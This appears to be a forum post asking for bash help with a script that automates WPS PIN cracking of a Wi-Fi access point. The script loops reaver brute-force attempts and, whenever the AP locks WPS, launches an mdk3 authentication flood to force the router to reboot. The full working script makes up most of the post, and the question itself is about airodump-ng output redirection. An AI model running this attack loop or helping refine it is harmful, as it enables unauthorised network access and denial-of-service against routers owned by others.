First of all, sorry for my poor English. I'm trying to write a bash script in order to perform AP WPS cracking using reaver. The problem is that after trying some WPS PINs, the AP locks WPS, so reaver is no longer useful.
To solve this, I perform an mdk3 attack to force the AP to reboot and be able to attack it again (after the reboot, WPS restarts in an unlocked state).
The problem with this approach is that:
- I have to be in front of the PC, watching for when the AP becomes locked, and
- run an mdk3 attack, stop it when the AP has rebooted, and then run the reaver attack again. The solution to this is obviously a script.
I wrote the following lines, which should solve this.
I have to say that I'm a total noob in bash scripting, so the script is not "professional"; it's just a "workaround" to solve my problem.
#!/bin/bash
while true; do
  # Switch to the correct channel and save it into $channel
  echo Detecting AP channel
  timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
  rm ap_channel 2> /dev/null
  touch ap_channel
  timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
  channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
  rm ap_channel

  # Attack the AP while it isn't WPS-locked
  rm ap_status 2> /dev/null
  timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
  while [ -z "$(grep Locked ap_status)" ]; do
    echo Performing reaver attack
    aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
    timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
    rm ap_status
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
  done

  # The AP is now locked. Perform an mdk3 attack (in order to reboot the AP) while the AP WPS status is Locked
  ((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
  mdk3_pid=$!
  rm ap_status
  timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
  while [ -n "$(grep Locked ap_status)" ]; do
    echo Trying to reboot the AP
    rm ap_status
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
  done

  # The AP has now rebooted. Kill the mdk3 process and wait 2 mins before restarting the reaver attack
  kill -9 $mdk3_pid
  echo AP rebooted. Waiting 2 mins till AP init
  sleep 120
done
The problem with this script is that the stdout redirection that I use for the airodump output behaves differently when I execute it directly on the command line than when I execute it inside the script.
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
I need a way to execute the line above within the script as if I were executing it directly in the tty. I can't do this using exec because I need to continue with the script.
NOTE: I can't use the -w option for airodump-ng because it doesn't save the WPS status.
Could someone please help me with this?